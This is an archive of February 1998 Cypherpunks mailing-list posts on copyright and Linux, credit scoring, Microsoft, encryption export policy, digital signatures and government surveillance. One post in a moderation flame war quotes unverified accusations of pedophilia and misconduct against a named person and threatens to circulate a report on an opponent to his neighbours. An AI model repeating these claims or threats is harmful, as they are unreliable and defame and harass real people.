Jim Choate (ravage@ssz.com) wrote:
>If there were no copyright nobody would have any reason to market software
>or much else for that matter.

So I presume that Linux doesn't exist[1]? And, for that matter, I make my
living writing software which is given away for free...

    Mark

[1] Yes, I'm aware the GPL uses copyright to enforce its conditions, but
it's copright-free in the important sense: anyone can copy Linux and use 
it with no fear of black ninjas at their door.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Fri, 6 Feb 1998 13:24:02 +0800
To: Jim Choate <cypherpunks@cyberpass.net>
Subject: Re: New Credit Rating System Coming [CNN]
In-Reply-To: <199802060405.WAA04465@einstein.ssz.com>
Message-ID: <19980206.045903.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

on or about 980205:2205, in <199802060405.WAA04465@einstein.ssz.com>, 
    Jim Choate <ravage@ssz.com> was purported to have 
    expostulated to perpetuate an opinion:

>                       NEW CREDIT RATING SYSTEM ON HORIZON
>                                        
>      graphic February 5, 1998
>      Web posted at: 2:38 p.m. EST (1938 GMT)
>      
>      NEW YORK (AP) -- Within months, retailers will be able to use a new
>      computerized credit-rating system to decide not only whether they'll
>      take your check or debit card, but how big a check you can write.
>      
>      Banks will be able to use the system to determine whether they will
>      let you open a checking account, and what kind of fees you will pay.
>      
>      Deluxe Corp., the nation's biggest check printer, has joined Fair,
>      Isaac & Co., a credit scoring company, and Acxiom Corp., a data
>      warehouse, to create the system for rating a merchant's risk of
>      accepting checks and debit cards.
>
    so where is the First Virtual Bank of Cyberspace? let's get crackin'

    basically, this says I can not write a check against an available
    balance that has not been overnight posted. when TTI (transaction
    technology), a CitiBank division in Santa Monica, started working on
    the ATM implementations in the mid-70, all the last, bad crop of hired
    guns were contracting --they were paying 50-80/hr _then_ for high
    end --we all took there money and speculated that eventually there
    a) would be no cash; and b) checks would be castrated --or, if you
    did not have plastic, you did not eat as big brother wanted to know
    what you had for dinner--  yup, sounds just like cybercredits --except
    for the audit trail fed directly to the IRS who precomputed your tax
    for you-- and took it out of your account with or without your     
    permission.

    well, how close are we getting to what those of us working on it in
    the mid-70s feared?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNNqbr7R8UA6T6u61AQGscAH/cDmpNgdaMuZAdB+bBZRXzz5EjM40RhBD
wgolht1512aKcXCfXv0LmNbsIPwv6fFCKpldrMyFag0RRdgt+qslUQ==
=UvQI
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Fri, 6 Feb 1998 13:44:09 +0800
To: Jim Burnes <cypherpunks@cyberpass.net
Subject: Re: the best justice/kinds of monopolies
In-Reply-To: <34DA3157.1FF4FA7A@ssds.com>
Message-ID: <19980206.052451.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

on or about 980205:1438, in <34DA3157.1FF4FA7A@ssds.com>, 
    Jim Burnes <jim.burnes@ssds.com> was purported to have 
    expostulated to perpetuate an opinion:

>Jim Choate wrote:
>> 
>> Forwarded message:
>> 
>> > Date: Thu, 5 Feb 1998 08:23:58 -0800 (PST)
>> > From: mark@unicorn.com
>> > Subject: Re: the best justice money can buy --Lessig
>> 
[snip]

>so unless further information comes in it looks like a
>natural monopoly.  What does it take to undo a natural monoply?

>Build something cheaper, better and more reliable.

>Its just possible (and this might be a stretch, but only by a little)
>that Linux, Free Netscape Sources, Java etc might acheive this.
>Certainly Apache is more popular than any other webserver.

>How you come up with a new product in this type of market without
>M$ "re-inventing it" and giving it away is anyone's guess.

>(1) Hope that Linux/Scape/Java/KDE do something big
>(2) Write a Win95/NT compatible operating system that is
>    faster and cheaper.  If you can clone a Pentium, you
>    can clone Windoze.  (visions of a QNX like OS with Win32
>    API dance in my head).  A GPL'd VSTa-based Win32 OS
>    would be pretty amazing.  This would be necessary because
>    games are a big market and the Linux kernel just doesn't
>    have what it takes to do realtime without a major hack.
>    How about VSTa/a free DOS emulator/Wine.  If Sun would
>    fund this effort it could take a lot of wind out of
>    M$ sails.  Probably more than Java.  McNeally would have
>    to hop down from his high-horse.

>    When will this happen?  When the market gets tired of
>    M$ practices and some lucky competitor comes to the
>    fore.  Until then there is no devine right to a percentage
>    of the operating system market share.

>We can only code and hope.

>(donning flame retardant vest)
>jim burnes

    dont need a flame retardent vest for my direction. I agree in theory
    that all it takes is a better product --unless the 800 lb gorilla
    steals it, borrows it, whatever and puts it out for free which they
    have been know to do on more than one occasion.

    and, the fact M$ has such enormous leverage in the market to command
    the pole position for any product they promote (even vapourware), is
    why society does have a responsibility to its members to level the
    playing field.  until the sheeple stop following the Judas to the
    Micro$lop slaughter house, the law must finally step in and break it
    up --or as Orrin Hatch said: "if M$ does monopolize the net, look for
    an "Federal Internet Commission" --using the law to surgically dismember
    M$ into logical divisions is one thing --living with another regulatory 
    commission is another, and certainly not very "tasty".

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNNqhIrR8UA6T6u61AQErYgIAlBOGfnn/R9IuZD42Yl2hRb2amKY8049s
bLaD3SdJd4ulqoTkvl/UiM3hF6vhs3bbe0N1PN4xpZrgW5GxSCoGPA==
=B0dD
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 7 Feb 1998 08:27:28 +0800
To: Information Security <cypherpunks@cyberpass.net>
Subject: Re: Fingerprinting in CA [was Whoa: British SmartCard rollout]
In-Reply-To: <199802040323.WAA16673@panix2.panix.com>
Message-ID: <3.0.5.32.19980206074009.0085b8c0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>>   How did you CA cypherpunks feel about being fingerprinted?

Well, if I'd been thinking about it, I'd have put some rubber cement and
whiteout on my thumb before getting the license :-)
More the issue at the time was that the politicians were
busy deciding that your ability to drive safely obviously depended
on whether your citizenship papers were in order (the month
I got it they'd temporarily stopped doing that.)
I recently renewed the license, and they didn't ask for papers
or thumbprints, but they still don't print the license at the 
remote DMV offices; they print them centrally because it simplifies
verifying your information with the INS thugs.

The citizenship papers issue has basically doubled the market
for counterfeit licenses; it's not just excessively bad drivers
who bribe DMV employees any more.

Back when I lived in New Jersey, the cops would set up traffic stops
not only to look for drunk drivers (at 9am?!), but also to check
if your papers were in order.  I haven't seen much of that in California,
but presumably the Southern part of the state does it more often
to catch Spanish speakers who are loose in the population.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 7 Feb 1998 08:23:23 +0800
To: cypherpunks@Algebra.COM
Subject: Fwd: e-commerce and rights management list
Message-ID: <3.0.5.32.19980206074313.0085b190@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



This showed up on a bunch of lists, not including cypherpunks or
cryptography; Phil Agre added some interesting commentary and
sent it to the Red Rock Eater list so I'm forwarding that version.

>From: Phil Agre <pagre@weber.ucsd.edu>
>To: rre@weber.ucsd.edu
>Subject: e-commerce and rights management
>X-URL: http://communication.ucsd.edu/pagre/rre.html
>X-Mailing-List: <rre@weber.ucsd.edu> archive/latest/1815
>
>[When Judie sent me the announcement for her new mailing list on practical
>aspects of deploying rights management and e-commerce technologies, I
>was incredulous that such a list doesn't already exist.  She persuaded me
>by means of the following catalog of related lists, which may be of some
>interest.  I assume that you can track down subscription info with the
>standard search tools.  encryption/certificates: ieft-pkix, ieft-open-pgp,
>ieft-ldapext, cert-talk, spki, kerberos, dcsb, alice; digital signatures:
>temple, california, georgia, texas; copyright: cni-copyright, ecup; legal:
>cyberia, law-ipr, euro-lex; rights: cyber-rights, web-rights; e-commerce:
>e-commerc, ica, e-payments; digital libraries: liblicensing, diglib, ifla.]
>
>=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>This message was forwarded through the Red Rock Eater News Service (RRE).
>Send any replies to the original author, listed in the From: field below.
>You are welcome to send the message along to others but please do not use
>the "redirect" command.  For information on RRE, including instructions
>for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
>=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
>Date: Wed, 4 Feb 1998 12:36:26 -0500 (EST)
>From: Judie Mulholland <judiemul@kc-inc.net>
>Subject: announcing E-CARM, a new mailing list (fwd)
>
>[...]
>
>----------------------------------------------------------------------	
>	      Announcing the creation of a new mailing list:
>
>	     ***E-COMMERCE AND RIGHTS MANAGEMENT (E-CARM)***
>		                    
>----------------------------------------------------------------------
>
>This mailing list has been established to foster and support an on-line
>discussion forum where we can:
>
>	* debate (non) technical, administrative and managerial issues
>   	  pertaining to: secure transactions, competing rights management 
>	  models (e.g. ECMS, PICS, certificates, FIRM, etc.), evolving
>	  standards, supporting technologies and other approaches for
>	  enabling electronic commerce;
>	* inform each other about upcoming conferences, workshops, etc.
>	* point to online papers, resources/links, new apps, web
>	  sites, etc.
>	* identify the critical factors relevant to design, development
>	  and implementation of a rights management infrastructure;
>	* raise questions, share problems, relate concerns;
>	* share success/horror stories;
>	* and much, much more ...
>
>If you are interested in subscribing to this list, please send a message
>to:
>
><listproc@lists.fsu.edu>
>
>with the following line in body of the message (NOT the subject):
>
>subscribe e-carm "FirstName LastName" (without the quotation marks)
>
>and after you are notified that you have been subbed, we would ask that
>you send a short note to the list, briefly introducing yourself and your
>interests in e-commerce and rights management so that we can begin to come
>together as a community of shared interest(s).
>
>E-CARM is intended to be a member-driven, open, collaborative mailing
>list. However, its success in creating a viable on-line forum will
>depend on individual contributions. As a step in this direction, we
>encourage you to share this announcement with other mailing lists or
>anyone who may be interested in getting involved.
>
>Looking forward to seeing all of you on E-CARM,
>
>Judie Mulholland
>Rajiv Kaushik
>
>List Moderators
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 6 Feb 1998 21:07:52 +0800
To: cypherpunks@toad.com
Subject: BXA Crypto Meet
Message-ID: <1.5.4.32.19980206125248.00721fd0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



A report on this would be welcomed. Does anyone know who 
are the subcommittee members?

----------

Federal Register: February 6, 1998 (Volume 63, Number 25)
Page 6153

---------------------------------------------------------

Bureau of Export Administration
 
President's Export Council Subcommittee on Encryption; 
Partially Closed Meeting

    A partially closed meeting of the President's Export 
Council Subcommittee on Encryption will be held February 23, 
1998, 2 p.m., at the U.S. Department of Commerce, Herbert C. 
Hoover Building, Room 4832, 14th Street between Pennsylvania 
and Constitution Avenues, NW., Washington, DC. The 
Subcommittee provides advice on matters pertinent 
to policies regarding commercial encryption products.

Public Session

    1. Opening remarks by the Chairman.
    2. Presentation of papers or comments by the public.
    3. Update on Administration commercial encryption policy.
    4. Discussion of task force development and work plan.

Closed Session

    5. Discussion of matters properly classified under Executive 
Order 12958, dealing with the U.S export control program and 
strategic criteria related thereto.

Dated: February 3, 1998.

William V. Skidmore,
Acting Deputy Assistant Secretary for Export Administration.
FR Doc. 98-3001 Filed 2-5-98; 8:45 am







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 6 Feb 1998 22:17:56 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: the best justice money can buy --Lessig (fwd)
Message-ID: <199802061414.IAA05746@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 6 Feb 1998 03:13:00 -0800 (PST)
> From: mark@unicorn.com
> Subject: Re: the best justice money can buy --Lessig (fwd)

> Jim Choate (ravage@ssz.com) wrote:
> >If there were no copyright nobody would have any reason to market software
> >or much else for that matter.
> 
> So I presume that Linux doesn't exist[1]? And, for that matter, I make my
> living writing software which is given away for free...

So do I, and I bet both our incomes combined doesn't add up to 15 minutes of
Bill G's and it won't. From a market perspective we're flies on the back of
great elephant. Please be so kind as to describe how and why this marketing
mechanism (copyleft) will succed? I've been using and supporting Linux since
1993 (SSZ is listed as a source site in the back of 'Running Linux' since 
day one) in this manner neither I or anyone else has gotten rich. Linus made
so much money off it that he went to work for a company in So. Cali. writing
fully commercial software...  

> [1] Yes, I'm aware the GPL uses copyright to enforce its conditions, but
> it's copright-free in the important sense: anyone can copy Linux and use 
> it with no fear of black ninjas at their door.

It's copyrighted in the important sense in that it uses the copyright to
enforce its conditions. That is just as important as the marketing decisions
made by it.



    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 6 Feb 1998 22:27:32 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: the best justice money can buy --Lessig (fwd)
Message-ID: <199802061421.IAA05806@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 6 Feb 1998 03:13:00 -0800 (PST)
> From: mark@unicorn.com
> Subject: Re: the best justice money can buy --Lessig (fwd)

> Jim Choate (ravage@ssz.com) wrote:
> >If there were no copyright nobody would have any reason to market software
> >or much else for that matter.
> 
> So I presume that Linux doesn't exist[1]? And, for that matter, I make my
> living writing software which is given away for free...
> 
> [1] Yes, I'm aware the GPL uses copyright to enforce its conditions, but
> it's copright-free in the important sense: anyone can copy Linux and use 
> it with no fear of black ninjas at their door.

A couple of other points.

I've never claimed the monopolization would exist over nite or that it
wouldn't be filled with short term conflicts and ups-n-downs. Only that the
*long-term* result is a monopolized market. A point you seem to gloss over
as irrelevant. Let's give the market another 5-10 years and see where Linux
stands. Right now the estimate is 6-10 million users world wide use it. Share
wise that isn't a lot. The reason that Linux garners so much press right now
is that it is in fact an exception when an organization uses the software
(eg NASA). The test will be whether it grows significantly over the long
run and not the 5 years that Linux has been a serious os.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 6 Feb 1998 21:44:18 +0800
To: bill.stewart@pobox.com
Subject: Re: Feds Approve Bank to Certify Digital Signatures
In-Reply-To: <199802051901.LAA19858@comsec.com>
Message-ID: <199802061333.IAA22492@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



I'm not sure it is unfortunate that they'll be offering escrow.  If
its a complete flop, then we'll be able to point to the complete
failure of the released system.

Time for some Big Brother inside stickers to be printed out, slapped
on flyers for the program, and remailing to potential customers. :)

Anyone work at ZNB?  Want help quitting?

Adam


Bill Stewart wrote:
| There was a note to Dave Farber's list that the Office of the 
| Comptroller of Currency has approved Zion's First National Bank
| to certify digital signatures.  Since they're in Utah, Zion's has
| 
| They're going to offer digital signature certificates
| with the usual binding of a key to a body plus papers,
| and provide software to support it.  Some of their software
| can be used for encryption, and unfortunately they're
| going to offer key escrow, though as a separate business
| service, with keys encrypted by the key's corporate owner
| as well as by the bank for protection, but it's not
| going to be a mandatory service, and they have no intention
| of offering escrow for signature keys, only encryption keys.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 6 Feb 1998 22:44:25 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: slashdot.org news update...
Message-ID: <199802061438.IAA05946@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.slashdot.org/

>    John Ousterhout leaves SunScript Contributed by CmdrTaco on Thu Feb 5
>    23:38:53 1998 EST
>    [Sun Microsystems] From the other-disappearing-acts Dept
>    Markus Fleck (aka python) wrote in to say "John Ousterhout, author of
>    the Tcl language and the Tk toolkit, also of Spring OS fame, has left
>    SunScript to form his own company, called Scriptics, to promote the
>    use and further development of Tcl. - I suppose that Sun didn't find
>    paying for Tcl development worthwhile any more, because there has
>    hardly been any revenue from it yet (even the source for the Tcl
>    Plugin for web browsers was made freely available when a poll showed
>    that too few people would be willing to pay for being able to execute
>    "Tclets" in their browsers)."

>    Be x86 Coming Contributed by CmdrTaco
>    [Be] Thu Feb 5 16:26:43 1998 EST
>    From the mr-be-sharp dept.
>    Sean Simmons wrote in to tell us that BeOS for x86 should be released
>    at SD98. Check out this TechWeb Story for more details. I would love
>    to get my hands on a copy.
>    Read More...
>    21 comment(s)

>    Should Netscape Sell Linux? Contributed by Justin
>    [Netscape] Thu Feb 5 16:11:27 1998 EST
>    From the not-a-bad-idea dept.
>    An article at the Boston Globe presents an interesting solution to
>    Netscape's recent losses in the browser war. The author suggests
>    Netscape create and sell their own Linux distribution, the reason
>    being that Microsoft will be able to leverage their control of the
>    operating system for some time. Read on.
>    Read More...
>    38 comment(s)

>    2600 In Danger Contributed by CmdrTaco
>    Thu Feb 5 10:56:14 1998 EST
>    From the sounds-familiar dept.
>    I)ruid wrote in to say " 2600 The Hacker Quarterly, has recently been
>    having financial problems due to it's previous distributor. To find
>    out the whole story, check out this page. 2600 needs our help, but
>    will not accept donations. However, there is a LOT of merchandice in
>    stock, and buying up their overstock will definately help, as well as
>    going down to your local bookstore and requesting that they carry
>    2600. So if you appreciate 2600 as much as I do, let's help give them
>    the help they need." My sentiments exactly.
>    Read More...
>    8 comment(s)

>    Cooking pot markets Contributed by CmdrTaco
>    Thu Feb 5 10:27:02 1998 EST
>    From the must-read dept.
>    Hackworth sent us a link to an article entitled Cooking pot markets.
>    The article is an extremely good read, and addresses issues like What
>    Motiviates Free Software guys. I suspect most of us free software guys
>    already know what is said here, but this article puts it very clearly
>    for people who might understand it a bit less can be clued it.
>    Read More...
>    3 comment(s)

>    Des2, Bovine and Slashdot Contributed by CmdrTaco
>    [Encryption] Thu Feb 5 10:09:40 1998 EST
>    From the bits-and-bytes dept.
>    Distributed.net has been working hard to crack the Des2 contest inside
>    the 22 day limit, but it doesn't look like it's going to happen,
>    despite Team Slashdot's rising in the ranks to #13. Thanks to the
>    125-150 of you who have been contributing keys in our name!

>      Editorials
>    
>    Slashdot is participating in RC5. Read who's helping, and why. Check
>    out Our Current Rank.
>    
>    Read Rob's Solution to the Browser Battle and a followup with comments
>    from a Netscape Engineer. Interesting especially now that Netscape
>    Agreed!


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Fri, 6 Feb 1998 22:53:34 +0800
To: cypherpunks@toad.com
Subject: Re: Changing to Moderated Cypherpunks -- How?
Message-ID: <199802061422.JAA00615@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Soon I won't see you anymore, using the moderated list.

   >   Thu Feb  5 20:22:33 1998
   >   Dimitry "Totally Impotent Since Prostrate Operation" The Dim wrote:
   >   
   >   Adam Back <aba@dcs.ex.ac.uk> writes:
   >   
   >   > Information Security <guy@panix.com>
   >   > > I'd be glad to handle it.
   >   > >
   >   > > The only criteria is to delete Dr. Dim and his nyms.
   >   >
   >   > How are you going to recognize Dimitri's nyms if he has any.
   >   
   >   Guy Polis thinks that anyone smarter than him (and that's 99.99% of the
   >   population) is my tentacle.  He thinks everything on this list except
   >   him and Timmy May is my tentacle, including you too, Adam.
   >   
   >   Guy Polis (guy@panix.com, eviljay@bway.net) is a pedophile child
   >   molester who was fired from his consulting position at Salomon Brothers
   >   after he was caught masturbating in his cubicle at the child pornography
   >   JPEGs that he downloaded from the Internet.
   >   
   >   In retaliation, Guy Polis spammed the firewalls mailing list with megabytes
   >   of e-mail logs that he "intercepted" at Salomon Brothers, and accused
   >   several of his former co-workers and supervisors of various crimes.
   >   
   >   As far as I can determine, Guy Polis has been unemployed since the time
   >   he was fired from Salomon.  If anyone knows otherwise, please let me know.

All you'll get is resounding silence, especially since you're so clueless
as to get my name wrong: hint...not even 'guy' is correct.

What a loser!

You must love everyone seeing the old traffic analysis report on you:

    You'll have to go to URL 'www.dejanews.com/home_ps.shtml' to pick it up.
    Select "old database" and use this in their search box:
 
    ~g soc.culture.jewish & ~dc 1997/08/04 & ~s Brighton Beach

Perhaps it should be updated and delivered to everyone in your neighborhood
and the building you give classes in?

You're just a ButtHead who never grew up, still gets a kick
out of saying "cocksucker".

Your brother Michael had to do your math thesis for you!
---guy

   You couldn't even cut it in Manhatten.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Fri, 6 Feb 1998 23:14:31 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: the best justice money can buy --Lessig (fwd)
In-Reply-To: <199802060155.TAA03984@einstein.ssz.com>
Message-ID: <34DB522F.5DE@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



> > Hmm... There's no copyright on perfumes.  There are market leaders in perfumes,
> > but no monopoly; hardly even an olygopoly.
> 
> I can tell how often you buy perfume, the ones I buy for my girlfriend
> certainly have a little 'c' on them...

The names of perfumes are (generally copyrighted.  The perfumes
(fragrances) themselves are not.  This leaves the door open for
knock-offs of the scent that then market under their own names -- and in
some cases, claims of being just like "whoever".

The situation is not parallel to sw because noone but a linux freak
hopes to swep anyone off their feet by putting a ribbon around a tiny
bit of sw and giving it for a BDay or VDay or whatever, astheydo with
the top name parfums.

PHM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 7 Feb 1998 00:51:21 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Test (cypherpunks@minder.net) [No Reply Please]
Message-ID: <199802061642.KAA06469@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Test

[No Reply Please]


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sat, 7 Feb 1998 04:14:24 +0800
To: cypherpunks@cyberpass.net
Subject: Software Money
Message-ID: <Pine.GSO.3.95.980206113344.21120B-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





http://cgi.pathfinder.com/netly/editorial/0,1012,1722,00.html

The Netly News (http://netlynews.com/)
February 2, 1998

Software Money
by Declan McCullagh (declan@well.com)

        Successful political campaigns follow a simple formula: 1) Spend
   heaps of money; 2) Puzzle out how to squeeze your message into one
   sentence, or, better yet, a bumper sticker.

        Silicon Valley finally got the first part right. Software
   chieftains, historically eager to squander cash on doomed marketing
   campaigns but loath to spend the same opposing government regulations,
   are about to ante up millions to detangle the skein of rules that
   restrict sales of data-scrambling encryption software. Sure, it's
   pocket change to California's zillionaires, but it may be just enough
   to get their deregulatory point across in the nation's capital.

[...]

       Together the duo will coordinate the lobbying and media efforts
   of a new industry coalition, as yet unnamed but likely to be dubbed
   something like the Alliance for Computer Privacy. The
   soon-to-be-announced project (contracts haven't been signed yet) grew
   out of the Alliance for a Secure Tomorrow, which firms hurriedly
   created last fall to battle FBI-backed legislation banning software
   such as PGP, which is capable of encoding messages so securely that
   police can't crack them. But the AST languished. Soon CEOs of more
   than a dozen high-tech companies started talking about a more
   aggressive approach. "The only time you're going to win this battle is
   when you put money on the table," says Lauren Hall of the Software
   Publishers Association.

[...]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: BMM <bmm@minder.net>
Date: Sat, 7 Feb 1998 01:43:24 +0800
To: cypherpunks@minder.net
Subject: new CDR node
Message-ID: <Pine.LNX.3.96.980206122910.26938A-100000@ns.minder.net>
MIME-Version: 1.0
Content-Type: text/plain



A cypherpunks distributed list node is now available at
cypherpunks@minder.net.  I would appreciate it if the current CDR ops
would add a feed to this address.  Thanks.

-BMM

-
bmm@minder.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sat, 7 Feb 1998 06:14:24 +0800
To: cypherpunks@cyberpass.net
Subject: The schizophrenic White House and the Internet
Message-ID: <Pine.GSO.3.95.980206130304.8220C-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Fri, 6 Feb 1998 13:01:05 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: The schizophrenic White House and the Internet

Carl makes a good point. When it comes to the Internet, the Clinton-Gore
administration is schizophrenic. Ira Magaziner and other White House
officials say their attitude towards the Internet is "hands off" and
"deregulatory" -- a line that certainly makes for good copy from
journalists who don't know any better and don't take the time to learn
more.

But in truth White House policy is far from hands off. Here are a few
areas where the Clinton-Gore administration is calling for greater
regulation, subsidies, taxes, and government control of the Internet and
related technology: 

-- Criminal copyright (share software, go to jail)
-- Encryption regulations (export ctrls and proposed domestic rules)
-- CALEA / Digital Telephony wiretapping funding
-- Gore Commission talking about extending FCC rules to Net
-- Universal service (taxes and spending for Net access)
-- Rating systems (Clinton: "every Internet site" should self-label)
-- Net-taxation (has Clinton enorsed Cox-Wyden?)
-- Rapacious government databases (DoD recently demanded more access)
-- Subsidies for government-approved technologies
-- FTC considering banning spam (what about technical solutions?)
-- FTC actions on "children's privacy"
-- Clinton calling for V-Chip for Internet

These are hardly the actions of a deregulatory administration.

-Declan


---------- Forwarded message ----------
Date: Fri, 06 Feb 1998 15:33:44 -0500
From: Carl Ellison <cme@cybercash.com>
To: declan@well.com
Subject: Re: FC: Magaziner says "No regulation!" at Cato-Brookings event

-----BEGIN PGP SIGNED MESSAGE-----

Of course, this means gov't hands off crypto policy, too, right?

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.3

iQCVAwUBNNtzpxN3Wx8QwqUtAQFYHwP/XpBnkplWMZpc0bIfbNhEnlhzmUsXyMXa
rjfgnJGW8jX31fkbXZqcILcURPA31HfHu0K8y/FmmcoD5rcz9my3J785EL5903iS
gwm2zvF2uKMdIqACF7BP2pb1bmJvJYWWqXQP7SNjkQpbzFz0XGF4LHAFhbPf24Tw
e7694fdXoc4=
=vK41
-----END PGP SIGNATURE-----


+------------------------------------------------------------------+
|Carl M. Ellison  cme@cybercash.com   http://www.clark.net/pub/cme |
|CyberCash, Inc.                      http://www.cybercash.com/    |
|207 Grindall Street  PGP 08FF BA05 599B 49D2  23C6 6FFD 36BA D342 |
|Baltimore MD 21230-4103  T:(410) 727-4288  F:(410)727-4293        |
+------------------------------------------------------------------+








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Sat, 7 Feb 1998 04:52:56 +0800
To: cypherpunks@cyberpass.net
Subject: Krauts Weaken Constitutional Privacy
Message-ID: <199802062017.OAA23205@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



BONN, Germany (AP) -- Germany reduced constitutional guarantees of privacy
Friday to fight organized crime, ceding historical concerns over past
dictatorships to present-day realities. 
 
By a one-vote margin, parliament's upper house approved changes to the
constitution necessary for eventual passage of a law allowing electronic
surveillance in private households. 
 
Before approving the measure, however, the opposition Social Democrats won
a promise that a parliamentary committee would re-examine the proposed law
